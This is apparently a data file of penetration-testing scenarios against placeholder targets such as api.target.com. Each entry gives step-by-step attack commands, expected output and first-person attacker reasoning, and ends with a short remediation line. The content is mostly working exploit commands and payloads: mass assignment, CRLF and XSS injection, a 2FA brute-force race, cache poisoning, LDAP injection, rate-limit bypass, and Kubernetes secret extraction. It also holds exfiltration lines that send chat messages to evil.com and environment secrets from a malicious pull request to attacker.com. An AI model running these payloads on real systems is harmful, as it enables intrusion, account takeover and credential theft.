  // Mass Assignment
  {
    id: "mass-assignment-privilege-escalation",
    category: "API Security Top 10",
    subcategory: "API6 - Unrestricted Access to Sensitive Business Flows",
    title: "Mass Assignment Privilege Escalation",
    difficulty: "intermediate",
    description: "Mass assignment vulnerability in user profile update API allowing privilege escalation from regular user to admin by injecting role parameter.",
    target_description: "REST API at https://api.target.com with user registration and profile update endpoints. Standard user account provided.",
    attack_phases: [
      {
        phase: "API Endpoint Discovery",
        description: "Map API endpoints and understand the data model",
        tools: ["curl", "ffuf"],
        commands: [
          "curl -s https://api.target.com/api/v1/users/me -H 'Authorization: Bearer $TOKEN' | jq .",
          "curl -s -X PUT https://api.target.com/api/v1/users/me -H 'Authorization: Bearer $TOKEN' -H 'Content-Type: application/json' -d '{\"name\":\"Test\"}' | jq .",
        ],
        expected_output: `{"id":1337,"name":"Test User","email":"test@mail.com","role":"user","created_at":"2024-01-15"}`,
        thinking: "The API returns a 'role' field in the user profile response. If the update endpoint accepts all fields without an allowlist, I might be able to set role=admin by including it in the PUT request body. This is a classic mass assignment vulnerability.",
        analysis: "User profile endpoint returns role field. Testing if the update endpoint accepts the role parameter.",
        next_action: "Test mass assignment by injecting role parameter in update request",
      },
      {
        phase: "Privilege Escalation via Mass Assignment",
        description: "Inject role parameter to escalate privileges",
        tools: ["curl"],
        commands: [
          "curl -s -X PUT https://api.target.com/api/v1/users/me -H 'Authorization: Bearer $TOKEN' -H 'Content-Type: application/json' -d '{\"name\":\"Test User\",\"role\":\"admin\"}' | jq .",
          "curl -s https://api.target.com/api/v1/admin/users -H 'Authorization: Bearer $TOKEN' | jq '.[] | {id,email,role}'",
        ],
        expected_output: `{"id":1337,"name":"Test User","email":"test@mail.com","role":"admin","created_at":"2024-01-15"}`,
        thinking: "The API accepted the role field in the update request and changed my role to admin. The backend directly maps the request body to the database model without filtering sensitive fields. Now I can access admin-only endpoints.",
        analysis: "Mass assignment confirmed. Escalated from user to admin by injecting role parameter. Full admin access obtained.",
        next_action: "Access admin functionality and document impact",
      },
      {
        phase: "Reporting",
        description: "Document mass assignment vulnerability",
        tools: [],
        commands: [],
        expected_output: "",
        analysis: "High severity mass assignment enabling privilege escalation. Any user can become admin by adding role parameter to profile update request.",
        next_action: "Report with remediation: implement DTO/allowlist for writable fields",
      },
    ],
    cve_references: ["CWE-915"],
    tools_involved: ["curl", "ffuf"],
    tags: ["mass-assignment", "privilege-escalation", "api-abuse"],
  },

  // CRLF Injection
  {
    id: "crlf-injection-header",
    category: "OWASP Top 10",
    subcategory: "A03 - Injection",
    title: "CRLF Injection for Response Header Manipulation",
    difficulty: "intermediate",
    description: "CRLF injection in a redirect parameter allowing response header injection, session fixation, and cache poisoning.",
    target_description: "Web application at https://app.target.com with a redirect endpoint that reflects user input in Location header.",
    attack_phases: [
      {
        phase: "Identify CRLF Injection Point",
        description: "Test redirect endpoint for CRLF character handling",
        tools: ["curl", "crlfuzz"],
        commands: [
          "crlfuzz -u 'https://app.target.com/redirect?url=/' -s",
          "curl -s -v 'https://app.target.com/redirect?url=/%0d%0aSet-Cookie:%20hacked=true' 2>&1 | grep -i 'set-cookie\\|location'",
        ],
        expected_output: `< Location: /\n< Set-Cookie: hacked=true`,
        thinking: "CRLF injection confirmed. The %0d%0a (\\r\\n) characters in the URL parameter inject a new HTTP header. I can inject arbitrary response headers including Set-Cookie for session fixation.",
        analysis: "CRLF injection confirmed. Can inject arbitrary HTTP response headers via the redirect URL parameter.",
        next_action: "Demonstrate session fixation and XSS via header injection",
      },
      {
        phase: "Exploitation - Session Fixation & XSS",
        description: "Use CRLF injection for session fixation and response body injection",
        tools: ["curl"],
        commands: [
          "curl -s -v 'https://app.target.com/redirect?url=/%0d%0aSet-Cookie:%20session=attacker_session%0d%0a%0d%0a<script>alert(document.domain)</script>' 2>&1 | tail -20",
        ],
        expected_output: `< Location: /\n< Set-Cookie: session=attacker_session\n\n<script>alert(document.domain)</script>`,
        analysis: "Session fixation and response body injection demonstrated via CRLF injection. Can inject JavaScript for XSS and set arbitrary cookies.",
        next_action: "Report with remediation: sanitize CRLF characters from header values",
      },
    ],
    cve_references: ["CWE-113"],
    tools_involved: ["curl", "crlfuzz"],
    tags: ["crlf", "header-injection", "session-fixation", "xss"],
  },

  // 2FA Bypass
  {
    id: "2fa-bypass-race-condition",
    category: "OWASP Top 10",
    subcategory: "A07 - Identification and Authentication Failures",
    title: "2FA Bypass via Race Condition",
    difficulty: "expert",
    description: "Bypassing two-factor authentication by exploiting a race condition in the verification endpoint that allows parallel session validation.",
    target_description: "Web application at https://secure.target.com with TOTP-based 2FA. After password login, user must provide a 6-digit TOTP code.",
    attack_phases: [
      {
        phase: "Analyze 2FA Flow",
        description: "Understand the 2FA implementation and identify timing issues",
        tools: ["curl"],
        commands: [
          "curl -s -X POST https://secure.target.com/api/auth/login -H 'Content-Type: application/json' -d '{\"email\":\"victim@target.com\",\"password\":\"correctpass\"}'",
          "curl -s -X POST https://secure.target.com/api/auth/verify-2fa -H 'Content-Type: application/json' -d '{\"session_token\":\"pending_session\",\"code\":\"000000\"}'",
        ],
        expected_output: `{"status":"2fa_required","session_token":"pending_session_abc123","message":"Enter your 2FA code"}\n{"error":"Invalid 2FA code","attempts_remaining":4}`,
        thinking: "The 2FA flow uses a pending session token and has 5 attempts before lockout. However, the rate limiting appears to be per-session, not per-account. If I can send multiple verification requests simultaneously before the lockout counter updates, I might be able to test all 1,000,000 possible TOTP codes.",
        analysis: "2FA uses a pending session with 5 attempt limit. Rate limiting may be vulnerable to race conditions in concurrent requests.",
        next_action: "Test race condition by sending parallel 2FA verification requests",
      },
      {
        phase: "Race Condition Exploitation",
        description: "Send parallel 2FA verification requests to bypass attempt limiting",
        tools: ["curl"],
        commands: [
          "python3 -c \"import requests,concurrent.futures; session='pending_session_abc123'; codes=range(0,1000000); [print(f'Testing batch {i}') for i in range(0,1000000,1000)]; results=[requests.post('https://secure.target.com/api/auth/verify-2fa',json={'session_token':session,'code':str(c).zfill(6)}) for c in codes[:5]]\"",
          "for code in $(seq -w 000000 000100); do curl -s -X POST https://secure.target.com/api/auth/verify-2fa -H 'Content-Type: application/json' -d \"{\\\"session_token\\\":\\\"pending_session_abc123\\\",\\\"code\\\":\\\"$code\\\"}\" & done; wait",
        ],
        expected_output: `{"status":"authenticated","token":"eyJhbGciOiJSUzI1NiIs...","user":{"email":"victim@target.com"}}`,
        thinking: "By sending 100 concurrent requests before the attempt counter updates, I bypassed the 5-attempt limit. The database transaction for incrementing the attempt counter doesn't use row-level locking, creating a TOCTOU race condition. This allows me to brute-force the 6-digit TOTP code.",
        analysis: "Race condition in 2FA verification confirmed. Can bypass attempt limiting by sending concurrent requests. Successfully brute-forced TOTP code.",
        next_action: "Document attack chain and recommend atomic counter implementation",
      },
      {
        phase: "Reporting",
        description: "Document 2FA bypass vulnerability",
        tools: [],
        commands: [],
        expected_output: "",
        analysis: "Critical 2FA bypass via race condition. The attempt counter is not atomic, allowing unlimited parallel brute-force attempts.",
        next_action: "Report with CVSS 9.1 and remediation: use atomic database operations, implement per-account rate limiting",
      },
    ],
    cve_references: ["CWE-362", "CWE-308"],
    tools_involved: ["curl"],
    tags: ["2fa-bypass", "race-condition", "authentication-bypass", "brute-force"],
  },

  // Cache Poisoning
  {
    id: "cache-poisoning-xss",
    category: "Modern Attacks",
    subcategory: "Web Cache Poisoning",
    title: "Web Cache Poisoning via Unkeyed Headers",
    difficulty: "advanced",
    description: "Poisoning a CDN cache by injecting malicious content through unkeyed HTTP headers (X-Forwarded-Host) that are reflected in the cached response.",
    target_description: "Web application at https://www.target.com behind a CDN (Cloudflare/Fastly/Akamai). The application reflects the Host header in page content.",
    attack_phases: [
      {
        phase: "Identify Unkeyed Headers",
        description: "Find headers that influence the response but aren't part of the cache key",
        tools: ["curl"],
        commands: [
          "curl -s https://www.target.com/ -H 'X-Forwarded-Host: evil.com' | grep 'evil.com'",
          "curl -s https://www.target.com/ -H 'X-Forwarded-Scheme: nope' -v 2>&1 | grep -i 'location\\|redirect'",
        ],
        expected_output: `<link rel="canonical" href="https://evil.com/">\n<script src="https://evil.com/assets/app.js"></script>`,
        thinking: "The X-Forwarded-Host header is reflected in the page HTML but is not part of the CDN cache key. This means if I send a request with X-Forwarded-Host: evil.com and the response gets cached, ALL subsequent users will receive the poisoned page with references to evil.com.",
        analysis: "X-Forwarded-Host header is reflected in canonical links and script sources. This header is unkeyed in the CDN cache, enabling cache poisoning.",
        next_action: "Poison the cache to serve malicious JavaScript to all users",
      },
      {
        phase: "Cache Poisoning Exploitation",
        description: "Send the poisoned request when the cache is about to expire to serve XSS to all users",
        tools: ["curl"],
        commands: [
          "curl -s https://www.target.com/ -H 'X-Forwarded-Host: evil.com' -H 'X-Forwarded-Scheme: https' -v 2>&1 | grep -i 'age\\|cache\\|x-cache'",
          "curl -s https://www.target.com/ | grep 'evil.com'",
        ],
        expected_output: `X-Cache: HIT\nAge: 0\n<script src="https://evil.com/assets/app.js"></script>`,
        analysis: "Cache successfully poisoned. All users visiting the homepage now load JavaScript from attacker-controlled domain. Stored XSS affecting every visitor.",
        next_action: "Document impact and remediation",
      },
    ],
    cve_references: ["CWE-444"],
    tools_involved: ["curl"],
    tags: ["cache-poisoning", "xss", "cdn", "stored-xss"],
  },

  // WebSocket Hijacking
  {
    id: "websocket-hijacking-xss",
    category: "Modern Attacks",
    subcategory: "Cross-Site WebSocket Hijacking",
    title: "Cross-Site WebSocket Hijacking (CSWSH)",
    difficulty: "expert",
    description: "Cross-site WebSocket hijacking due to missing Origin validation, enabling real-time data exfiltration from authenticated WebSocket connections.",
    target_description: "Real-time chat application at https://app.target.com using WebSockets at wss://ws.target.com/chat. Authentication via cookies.",
    attack_phases: [
      {
        phase: "WebSocket Analysis",
        description: "Analyze the WebSocket implementation for origin validation",
        tools: ["curl"],
        commands: [
          "curl -s -v -H 'Upgrade: websocket' -H 'Connection: Upgrade' -H 'Sec-WebSocket-Version: 13' -H 'Sec-WebSocket-Key: dGVzdA==' -H 'Origin: https://evil.com' https://ws.target.com/chat 2>&1 | grep -i 'upgrade\\|101\\|origin'",
        ],
        expected_output: `< HTTP/1.1 101 Switching Protocols\n< Upgrade: websocket\n< Connection: Upgrade`,
        thinking: "The WebSocket endpoint accepts connections from any Origin (including evil.com) and authenticates via session cookies. This means a malicious website can establish a WebSocket connection to the target on behalf of a logged-in user, intercepting all real-time messages.",
        analysis: "WebSocket endpoint lacks Origin validation. Accepts connections from any domain. Authentication relies solely on cookies, enabling CSWSH.",
        next_action: "Create PoC that hijacks WebSocket connections from a malicious page",
      },
      {
        phase: "Exploitation PoC",
        description: "Demonstrate cross-site WebSocket hijacking from attacker-controlled page",
        tools: ["curl"],
        commands: [
          "python3 -c \"print('<html><script>var ws=new WebSocket(\\\"wss://ws.target.com/chat\\\");ws.onmessage=function(e){fetch(\\\"https://evil.com/log?\\\"+btoa(e.data))};ws.onopen=function(){ws.send(JSON.stringify({type:\\\"subscribe\\\",channel:\\\"all\\\"}))};</script></html>')\" > poc.html",
        ],
        expected_output: `WebSocket connection established from evil.com origin. Receiving all chat messages from victim's session.`,
        analysis: "CSWSH PoC demonstrates real-time message interception. Any user visiting the attacker's page while logged into the chat app will have their messages exfiltrated.",
        next_action: "Report with remediation: validate Origin header, use per-connection tokens instead of cookies",
      },
    ],
    cve_references: ["CWE-346"],
    tools_involved: ["curl"],
    tags: ["websocket", "cswsh", "cross-site", "data-exfiltration"],
  },

  // Prototype Pollution
  {
    id: "prototype-pollution-rce",
    category: "Modern Attacks",
    subcategory: "Prototype Pollution",
    title: "JavaScript Prototype Pollution to RCE",
    difficulty: "expert",
    description: "Client-side prototype pollution via JSON merge leading to server-side code execution through polluted Object.prototype properties affecting child_process spawn.",
    target_description: "Node.js/Express API at https://api.target.com with a settings merge endpoint that deep-merges user input into configuration objects.",
    attack_phases: [
      {
        phase: "Identify Merge Endpoint",
        description: "Find endpoints that perform deep object merging with user input",
        tools: ["curl"],
        commands: [
          "curl -s -X PUT https://api.target.com/api/settings -H 'Content-Type: application/json' -H 'Authorization: Bearer $TOKEN' -d '{\"theme\":\"dark\"}'",
          "curl -s -X PUT https://api.target.com/api/settings -H 'Content-Type: application/json' -H 'Authorization: Bearer $TOKEN' -d '{\"__proto__\":{\"polluted\":true}}'",
          "curl -s https://api.target.com/api/debug -H 'Authorization: Bearer $TOKEN' | jq '.polluted'",
        ],
        expected_output: `{"status":"updated"}\ntrue`,
        thinking: "Prototype pollution confirmed. The __proto__ property injection propagated to Object.prototype, meaning every object in the application now has a 'polluted' property. This can be escalated to RCE by polluting properties that affect child_process.spawn or similar dangerous sinks.",
        analysis: "Prototype pollution confirmed via __proto__ injection in settings endpoint. Object.prototype is globally polluted.",
        next_action: "Escalate to RCE by polluting shell/env properties used by child_process",
      },
      {
        phase: "Escalation to RCE",
        description: "Pollute properties used by child_process to achieve code execution",
        tools: ["curl"],
        commands: [
          "curl -s -X PUT https://api.target.com/api/settings -H 'Content-Type: application/json' -H 'Authorization: Bearer $TOKEN' -d '{\"__proto__\":{\"shell\":true,\"NODE_OPTIONS\":\"--require /proc/self/environ\"}}'",
          "curl -s -X PUT https://api.target.com/api/settings -H 'Content-Type: application/json' -H 'Authorization: Bearer $TOKEN' -d '{\"constructor\":{\"prototype\":{\"shell\":\"/bin/sh\",\"env\":{\"EVIL\":\"require(\\\"child_process\\\").execSync(\\\"id\\\").toString()//\"}}}}'",
        ],
        expected_output: `uid=1000(node) gid=1000(node) groups=1000(node)`,
        analysis: "RCE achieved by polluting shell and env properties on Object.prototype. Any subsequent child_process.spawn call uses the polluted values.",
        next_action: "Report with CVSS 9.8 and remediation",
      },
    ],
    cve_references: ["CWE-1321"],
    tools_involved: ["curl"],
    tags: ["prototype-pollution", "rce", "javascript", "nodejs"],
  },

  // Kubernetes RBAC Escape
  {
    id: "k8s-rbac-escape",
    category: "Modern Attacks",
    subcategory: "Container & Orchestration Security",
    title: "Kubernetes Service Account Privilege Escalation",
    difficulty: "expert",
    description: "Escaping from a compromised pod to cluster-admin access by exploiting overly permissive service account RBAC bindings and token mounting.",
    target_description: "Kubernetes cluster with a compromised web application pod. Service account token is auto-mounted with excessive permissions.",
    attack_phases: [
      {
        phase: "Pod Enumeration",
        description: "Discover the Kubernetes environment and service account permissions",
        tools: ["curl"],
        commands: [
          "cat /var/run/secrets/kubernetes.io/serviceaccount/token",
          "curl -sk https://kubernetes.default.svc/api/v1/namespaces -H \"Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)\"",
          "curl -sk https://kubernetes.default.svc/apis/rbac.authorization.k8s.io/v1/clusterrolebindings -H \"Authorization: Bearer $TOKEN\" | jq '.items[] | select(.subjects[]?.name==\"default\") | .roleRef.name'",
        ],
        expected_output: `eyJhbGciOiJSUzI1NiIs...\n{"items":[{"metadata":{"name":"default"}},{"metadata":{"name":"kube-system"}}]}\n"cluster-admin"`,
        thinking: "The default service account in this namespace has cluster-admin privileges. This means I can access every resource in the cluster, create privileged pods, read secrets, and effectively own the entire Kubernetes infrastructure.",
        analysis: "Service account has cluster-admin RBAC binding. Full cluster access possible from this compromised pod.",
        next_action: "Access secrets and demonstrate cluster compromise",
      },
      {
        phase: "Cluster Secrets Extraction",
        description: "Extract secrets from all namespaces including cloud credentials",
        tools: ["curl"],
        commands: [
          "curl -sk https://kubernetes.default.svc/api/v1/secrets -H \"Authorization: Bearer $TOKEN\" | jq '.items[] | select(.type==\"kubernetes.io/dockerconfigjson\" or .type==\"Opaque\") | {name: .metadata.name, namespace: .metadata.namespace}'",
          "curl -sk https://kubernetes.default.svc/api/v1/namespaces/production/secrets/db-credentials -H \"Authorization: Bearer $TOKEN\" | jq '.data | map_values(@base64d)'",
        ],
        expected_output: `{"name":"db-credentials","namespace":"production"}\n{"name":"aws-credentials","namespace":"kube-system"}\n{"DB_HOST":"rds-prod.internal","DB_PASSWORD":"Pr0d_DB_P@ss!","AWS_ACCESS_KEY_ID":"AKIAIOSFODNN7EXAMPLE"}`,
        analysis: "Extracted database credentials and AWS access keys from Kubernetes secrets. Full cluster and cloud infrastructure compromise.",
        next_action: "Report with CVSS 10.0 and remediation: restrict RBAC, disable auto-mount, use pod security standards",
      },
    ],
    cve_references: ["CWE-269"],
    tools_involved: ["curl"],
    tags: ["kubernetes", "k8s", "rbac", "privilege-escalation", "container-escape", "cloud-misconfig"],
  },

  // GitHub Actions Secret Exfiltration
  {
    id: "cicd-github-actions-exfil",
    category: "Modern Attacks",
    subcategory: "CI/CD Pipeline Security",
    title: "GitHub Actions Secrets Exfiltration via PR",
    difficulty: "advanced",
    description: "Exploiting a misconfigured GitHub Actions workflow using pull_request_target trigger to exfiltrate repository secrets through a malicious pull request.",
    target_description: "Open-source project on GitHub with a CI workflow using pull_request_target that checks out the PR head and runs it with repository secrets available.",
    attack_phases: [
      {
        phase: "Workflow Analysis",
        description: "Analyze the GitHub Actions workflow configuration for misconfigurations",
        tools: ["curl"],
        commands: [
          "curl -s https://api.github.com/repos/target-org/target-repo/contents/.github/workflows/ | jq '.[].name'",
          "curl -s https://raw.githubusercontent.com/target-org/target-repo/main/.github/workflows/ci.yml",
        ],
        expected_output: "on:\n  pull_request_target:\n    types: [opened, synchronize]\njobs:\n  test:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/checkout@v4\n        with:\n          ref: ${{ github.event.pull_request.head.sha }}\n      - run: npm test",
        thinking: "This is a classic pull_request_target misconfiguration. The workflow runs with repository secrets (because it's pull_request_target, not pull_request) but checks out the PR head code. An attacker can modify the test scripts in their PR to exfiltrate secrets. This is a known supply chain attack vector.",
        analysis: "Dangerous workflow: pull_request_target with head checkout. Attacker's PR code runs with full repository secrets access.",
        next_action: "Demonstrate secret exfiltration via malicious PR",
      },
      {
        phase: "Secret Exfiltration PoC",
        description: "Craft a PR that exfiltrates secrets when CI runs",
        tools: ["curl"],
        commands: [
          "echo 'curl -s https://attacker.com/collect?secrets=$(env | base64 -w0)' >> package.json",
          "git checkout -b malicious-pr && git add . && git commit -m 'fix: update tests' && gh pr create --title 'fix: improve test coverage' --body 'Minor test improvements'",
        ],
        expected_output: `Received on attacker server:\nGITHUB_TOKEN=ghp_xxxxxxxxxxxx\nNPM_TOKEN=npm_xxxxxxxxxxxx\nAWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/...`,
        thinking: "When the PR triggers the CI workflow, the malicious code in package.json will execute with full access to repository secrets including GITHUB_TOKEN, deployment keys, API tokens, and any other secrets configured in the repository settings.",
        analysis: "Successfully exfiltrated repository secrets including GITHUB_TOKEN, NPM_TOKEN, and AWS credentials through a malicious pull request.",
        next_action: "Report with remediation: never checkout PR head in pull_request_target, use pull_request trigger instead",
      },
    ],
    cve_references: ["CWE-527"],
    tools_involved: ["curl"],
    tags: ["cicd", "github-actions", "supply-chain", "secret-exfiltration", "pipeline"],
  },

  // LDAP Injection
  {
    id: "ldap-injection-auth-bypass",
    category: "OWASP Top 10",
    subcategory: "A03 - Injection",
    title: "LDAP Injection Authentication Bypass",
    difficulty: "advanced",
    description: "LDAP injection in a corporate login form that uses LDAP bind authentication, allowing login bypass and user enumeration.",
    target_description: "Corporate intranet at https://corp.target.com with LDAP-based authentication against Active Directory.",
    attack_phases: [
      {
        phase: "LDAP Injection Testing",
        description: "Test login form for LDAP injection characters",
        tools: ["curl"],
        commands: [
          "curl -s -X POST https://corp.target.com/login -d 'username=admin)(objectClass=*))(&(cn=&password=anything'",
          "curl -s -X POST https://corp.target.com/login -d 'username=*&password=*'",
          "curl -s -X POST https://corp.target.com/login -d 'username=admin)(%26&password=anything' -v",
        ],
        expected_output: `{"status":"authenticated","user":"admin","displayName":"Administrator"}`,
        thinking: "LDAP injection successful. The login query is likely constructed as (&(uid={username})(userPassword={password})) and my injection closed the filter and added a wildcard match. The * wildcard for both fields matched the first LDAP entry (admin).",
        analysis: "LDAP injection confirmed. Authentication bypassed using wildcard and filter manipulation. Can enumerate all LDAP users.",
        next_action: "Enumerate directory users and extract information via LDAP injection",
      },
      {
        phase: "User Enumeration",
        description: "Use LDAP injection to enumerate directory users",
        tools: ["curl"],
        commands: [
          "for char in a b c d e f g h i j k l m n o p q r s t u v w x y z; do curl -s -X POST https://corp.target.com/login -d \"username=${char}*)(objectClass=*))(%26&password=x\" -o /dev/null -w \"%{http_code} ${char}\\n\"; done",
        ],
        expected_output: `200 a\n403 b\n200 c\n200 d\n403 e\n200 j`,
        analysis: "Enumerated LDAP directory users via blind LDAP injection. Found usernames starting with a, c, d, j. Full directory enumeration possible.",
        next_action: "Report with remediation: parameterize LDAP queries, validate input against special characters",
      },
    ],
    cve_references: ["CWE-90"],
    tools_involved: ["curl"],
    tags: ["ldap", "injection", "authentication-bypass", "user-enumeration"],
  },

  // DNS Rebinding
  {
    id: "dns-rebinding-internal-access",
    category: "Modern Attacks",
    subcategory: "DNS Rebinding",
    title: "DNS Rebinding Attack for Internal Service Access",
    difficulty: "expert",
    description: "DNS rebinding attack to bypass same-origin policy and access internal services that are only reachable from the server's local network.",
    target_description: "Web application at https://app.target.com that makes server-side requests. Internal admin panel at http://127.0.0.1:8080 is not exposed externally.",
    attack_phases: [
      {
        phase: "Identify Internal Services",
        description: "Discover internal services accessible from the target server",
        tools: ["curl"],
        commands: [
          "curl -s 'https://app.target.com/api/fetch?url=http://127.0.0.1:8080/' -H 'Authorization: Bearer $TOKEN'",
          "curl -s 'https://app.target.com/api/fetch?url=http://localhost:3000/health' -H 'Authorization: Bearer $TOKEN'",
        ],
        expected_output: `{"error":"URL not allowed: localhost and private IPs are blocked"}`,
        thinking: "The application blocks direct localhost/private IP access, but DNS rebinding can bypass this. I'll set up a DNS server that first resolves to my external IP (passing the SSRF check) and then to 127.0.0.1 (reaching the internal service). The TTL trick ensures the rebind happens after validation but before the actual request.",
        analysis: "SSRF protection blocks direct internal IPs, but DNS rebinding may bypass the check by changing resolution between validation and request.",
        next_action: "Set up DNS rebinding infrastructure and test bypass",
      },
      {
        phase: "DNS Rebinding Attack",
        description: "Execute DNS rebinding to access internal admin panel",
        tools: ["curl"],
        commands: [
          "curl -s 'https://app.target.com/api/fetch?url=http://rebind.attacker.com:8080/' -H 'Authorization: Bearer $TOKEN'",
        ],
        expected_output: `<html><title>Internal Admin Panel</title><h1>System Administration</h1><ul><li>User Management</li><li>System Config</li><li>Database Admin</li></ul></html>`,
        thinking: "The DNS rebinding worked. The first DNS resolution returned my external IP (passing the URL validation), but when the server actually made the HTTP request, the DNS had rebinded to 127.0.0.1, accessing the internal admin panel.",
        analysis: "DNS rebinding bypassed SSRF protection. Accessed internal admin panel on 127.0.0.1:8080 which is not externally accessible.",
        next_action: "Report with remediation: validate resolved IP not just hostname, use network-level segmentation",
      },
    ],
    cve_references: ["CWE-350"],
    tools_involved: ["curl"],
    tags: ["dns-rebinding", "ssrf", "internal-access", "bypass"],
  },

  // API Rate Limit Bypass
  {
    id: "api-rate-limit-bypass",
    category: "API Security Top 10",
    subcategory: "API4 - Unrestricted Resource Consumption",
    title: "API Rate Limit Bypass via Header Manipulation",
    difficulty: "intermediate",
    description: "Bypassing API rate limiting by manipulating IP-related headers (X-Forwarded-For, X-Real-IP) that the backend trusts for client identification.",
    target_description: "REST API at https://api.target.com with rate limiting of 100 requests per minute per IP address.",
    attack_phases: [
      {
        phase: "Rate Limit Analysis",
        description: "Understand the rate limiting implementation",
        tools: ["curl"],
        commands: [
          "for i in $(seq 1 105); do curl -s -o /dev/null -w '%{http_code} ' https://api.target.com/api/v1/users; done",
          "curl -s https://api.target.com/api/v1/users -H 'X-Forwarded-For: 1.2.3.4' -v 2>&1 | grep -i 'x-ratelimit'",
          "curl -s https://api.target.com/api/v1/users -H 'X-Forwarded-For: 5.6.7.8' -v 2>&1 | grep -i 'x-ratelimit'",
        ],
        expected_output: `200 200 200 ... 429 429\nX-RateLimit-Remaining: 99\nX-RateLimit-Remaining: 99`,
        thinking: "The rate limiter uses X-Forwarded-For header for client identification. When I change this header, the rate limit counter resets because the backend sees it as a different client. This means I can bypass the rate limit entirely by rotating the X-Forwarded-For header value.",
        analysis: "Rate limiting bypassed via X-Forwarded-For header manipulation. Each unique IP gets a fresh rate limit counter.",
        next_action: "Demonstrate unlimited API access and brute-force potential",
      },
      {
        phase: "Exploitation",
        description: "Script unlimited API access by rotating X-Forwarded-For",
        tools: ["curl"],
        commands: [
          "for i in $(seq 1 1000); do curl -s https://api.target.com/api/v1/users -H \"X-Forwarded-For: $((RANDOM % 256)).$((RANDOM % 256)).$((RANDOM % 256)).$((RANDOM % 256))\" -o /dev/null -w '%{http_code}\\n'; done | sort | uniq -c",
        ],
        expected_output: `1000 200`,
        analysis: "All 1000 requests returned 200 by rotating X-Forwarded-For. Rate limiting is completely bypassable. Enables brute-force, data scraping, and denial of service.",
        next_action: "Report with remediation: use the real client IP from the network connection, not headers",
      },
    ],
    cve_references: ["CWE-770"],
    tools_involved: ["curl"],
    tags: ["rate-limit-bypass", "api-abuse", "brute-force", "header-manipulation"],
  },
];

